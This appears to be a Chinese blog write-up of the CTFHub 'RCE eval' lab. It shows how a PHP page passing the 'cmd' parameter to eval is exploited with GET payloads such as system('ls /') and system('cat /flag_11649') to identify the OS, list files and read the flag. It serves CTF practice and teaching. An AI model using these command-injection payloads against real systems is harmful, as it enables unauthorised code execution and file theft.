CTFHub-RCE eval执行

观察源代码

  • 我们可以发现源代码是request请求,所以我们可以通过GET或者POST请求,利用cmd参数进行命令执行

判断是Windows还是Linux

复制代码
#### 用GET请求

![](https://i-blog.csdnimg.cn/img_convert/3953fb442538c15685b5aa6926a79cba.jpeg)
*

  ```php
  /?cmd=system('ipconfig');
  ```

<!-- -->

* 无回显 说明不是Windows系统 ![](https://i-blog.csdnimg.cn/img_convert/0b03e2d748cacda3d7860d5e27391c10.jpeg)

<!-- -->

*

  ```php
  /?cmd=system('ifconfig');
  ```

<!-- -->

* 可以发现有回显,说明命令执行成功,系统为Linux ![](https://i-blog.csdnimg.cn/img_convert/480728712941dd82146cac1a7ab842d3.jpeg)

查看有哪些文件

复制代码
```php
/?cmd=system('ls');
```

![](https://i-blog.csdnimg.cn/img_convert/24d60e2455ee4331bd91e436a1f8c719.jpeg)
  • 显示只有index.php文件, 我们再查询根目录下的文件
复制代码
```php
/?cmd=system('ls /');
```
  • 发现目标flag文件

打开flag文件

复制代码
```php
/?cmd=system('cat /flag_11649');
```

![](https://i-blog.csdnimg.cn/img_convert/cb6bcfb2dbe991c3d366ba1b4b681326.jpeg)
  • 成功获取flag
相关推荐
AI绘画小331 天前
Web 安全核心真相:别太相信任何人!40 个漏洞挖掘实战清单,直接套用!
前端·数据库·测试工具·安全·web安全·网络安全·黑客
414a1 天前
LingJing(灵境):Linux Amd64局域网设备访问靶机教程
linux·安全·web安全·网络安全·lingjing·灵境
独行soc2 天前
2025年渗透测试面试题总结-264(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
骥龙2 天前
4.12、隐私保护机器学习:联邦学习在安全数据协作中的应用
人工智能·安全·网络安全
世界尽头与你2 天前
Go pprof 调试信息泄露漏洞
安全·网络安全·golang·渗透测试
Whoami!2 天前
❼⁄₂ ⟦ OSCP ⬖ 研记 ⟧ 查找漏洞的公共利用 ➱ 离线资源(上)
网络安全·信息安全·metasploit·searchsploit
世界尽头与你3 天前
CVE-2022-46463 Harbor public 镜像仓库信息泄露
安全·网络安全·渗透测试
XH-hui3 天前
【打靶日记】群内靶机vm1
linux·网络安全
2501_942119683 天前
HTTPS:企业网站SEO优化的基石与信任凭证
网络安全
世界尽头与你3 天前
CVE-2016-2183_ OpenSSL 信息泄露漏洞
网络安全·渗透测试